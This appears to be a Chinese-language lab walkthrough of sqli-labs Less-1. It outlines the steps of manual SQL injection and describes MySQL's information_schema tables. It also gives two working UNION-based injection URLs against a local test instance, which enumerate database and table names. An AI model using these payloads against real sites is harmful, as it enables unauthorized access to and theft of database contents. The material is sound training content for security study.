手工注入常規(guī)思路
1.判斷是否存在注入�,注入是字符型還是數(shù)字型
2.猜解 SQL 查詢語句中的字段數(shù)
3.確定顯示的字段順序
4.獲取當(dāng)前數(shù)據(jù)庫
5.獲取數(shù)據(jù)庫中的表
6.獲取表中的字段名
7.查詢到賬戶的數(shù)據(jù)
information_schema數(shù)據(jù)庫表說明
SCHEMATA表:提供了當(dāng)前mysql實(shí)例中所有數(shù)據(jù)庫的信息�����。是show databases的結(jié)果取之此表��。
TABLES表:提供了關(guān)于數(shù)據(jù)庫中的表的信息(包括視圖)���。詳細(xì)表述了某個表屬于哪個schema���,表類型����,表引擎,創(chuàng)建時(shí)間等信息�����。是show tables from schemaname的結(jié)果取之此表�。
COLUMNS表:提供了表中的列信息。詳細(xì)表述了某張表的所有列以及每個列的信息�。是show columns from schemaname.tablename的結(jié)果取之此表。
STATISTICS表:提供了關(guān)于表索引的信息�。是show index from schemaname.tablename的結(jié)果取之此表�。
USER_PRIVILEGES(用戶權(quán)限)表:給出了關(guān)于全程權(quán)限的信息�����。該信息源自mysql.user授權(quán)表���。是非標(biāo)準(zhǔn)表�����。
SCHEMA_PRIVILEGES(方案權(quán)限)表:給出了關(guān)于方案(數(shù)據(jù)庫)權(quán)限的信息�。該信息來自mysql.db授權(quán)表����。是非標(biāo)準(zhǔn)表。
TABLE_PRIVILEGES(表權(quán)限)表:給出了關(guān)于表權(quán)限的信息�����。該信息源自mysql.tables_priv授權(quán)表����。是非標(biāo)準(zhǔn)表。
COLUMN_PRIVILEGES(列權(quán)限)表:給出了關(guān)于列權(quán)限的信息。該信息源自mysql.columns_priv授權(quán)表��。是非標(biāo)準(zhǔn)表����。
CHARACTER_SETS(字符集)表:提供了mysql實(shí)例可用字符集的信息。是SHOW CHARACTER SET結(jié)果集取之此表�。
COLLATIONS表:提供了關(guān)于各字符集的對照信息。
COLLATION_CHARACTER_SET_APPLICABILITY表:指明了可用于校對的字符集�����。這些列等效于SHOW COLLATION的前兩個顯示字段��。
TABLE_CONSTRAINTS表:描述了存在約束的表��。以及表的約束類型�。
KEY_COLUMN_USAGE表:描述了具有約束的鍵列����。
ROUTINES表:提供了關(guān)于存儲子程序(存儲程序和函數(shù))的信息。此時(shí)��,ROUTINES表不包含自定義函數(shù)(UDF)����。名為“mysql.proc name”的列指明了對應(yīng)于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列�。
VIEWS表:給出了關(guān)于數(shù)據(jù)庫中的視圖的信息�。需要有show views權(quán)限,否則無法查看視圖信息��。
TRIGGERS表:提供了關(guān)于觸發(fā)程序的信息����。必須有super權(quán)限才能查看該表
MySQL GROUP_CONCAT()函數(shù)將組中的字符串連接成為具有各種選項(xiàng)的單個字符串。
實(shí)驗(yàn)192.168.8.172/sql/
Less-1
GET - Error based - Single quotes - String(基于錯誤的GET單引號字符型注入)
輸入id=1的正常頁面
數(shù)據(jù)庫的注釋用-- (這里有一個空格)��,但是在URL中最后加上-- ��,瀏覽器會把發(fā)送請求末尾的空格去掉���,所有我們用--+代替-- ����,因?yàn)?span lang="EN-US">+在URL被URL編碼后表示空格����。
先嘗試爆破數(shù)據(jù)庫名,將ID改為一個數(shù)據(jù)庫不存在的值����,使用union select1����,2���,3進(jìn)行聯(lián)合查詢查看是否有顯示位�����。
頁面返回正常�,因此該注入支持union聯(lián)合查詢注入��。
查詢有那些數(shù)據(jù)庫
http://127.0.0.1/sql/sqli-labs-master/Less-1/?id=qswz%27%20union%20select%201,(select%20group_concat(schema_name)from%20information_schema.schemata),3%20--+
命令解釋:
schema_name 當(dāng)前數(shù)據(jù)庫
information_schema (數(shù)據(jù)詞典)是MySQL自帶的數(shù)據(jù)庫�����,提供了訪問數(shù)據(jù)庫元數(shù)據(jù)的方式(元數(shù)據(jù)是關(guān)于數(shù)據(jù)庫的數(shù)據(jù)�,如數(shù)據(jù)庫名或表名,列的數(shù)據(jù)類型�����,或訪問權(quán)限等)
schemata (information_schema中的一個表):提供了當(dāng)前MySQL實(shí)例中所有數(shù)據(jù)庫的信息���。
爆出了數(shù)據(jù)庫
我們查詢一下security數(shù)據(jù)庫有那些表
http://127.0.0.1/sql/sqli-labs-master/Less-1/?id=qswz%27%20union%20select%201,(select%20group_concat(schema_name)from%20information_schema.schemata),(select group_concat(table_name)from information_schema.tables where table_schema='security')%20--+
這是手工注入的��,用sqlmap的話可以快速掃描出來的����。
|
